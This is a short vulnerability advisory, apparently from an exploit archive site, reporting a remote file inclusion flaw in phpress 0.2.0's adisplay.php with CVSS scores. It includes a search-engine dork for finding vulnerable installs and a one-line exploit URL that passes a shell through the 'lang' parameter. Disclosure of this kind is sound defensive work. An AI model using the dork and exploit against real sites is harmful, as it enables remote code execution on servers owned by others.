phpress 0.2.0 (adisplay.php) Remote File Inclusion

2007.08.27
Credit: naxx
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

:::::::::::::::::::::::::::::::::::::::::::::::::::..................... .. ::| \ | (_) | \ | | / ____| ::| \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __ _____ __ ::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \ \ /\ / / ::| |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\ V V / ::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___| \_/\_/ :::::::::::::::::::::::::::::We got the nicest name in the security scene! ::::::::Info::. ::Script: phpress ::Version: 0.2.0 ::Homepage:http://sourceforge.net/projects/phpress/ :: :::::::::Details::. ::Type: Remote_File_Inclusion ::Dork: allinurl:/phpress/ ::Exploit: http://host/phpress/adisplay.php?lang=shell :: :: ::Variable lang is not defined :: ::::::::::::::::::::::::::::::::. :::::::::::Additional_Information::. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::. ::Contact: cerbelum (at) gmail (dot) com [email concealed] ::Website: none yet :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top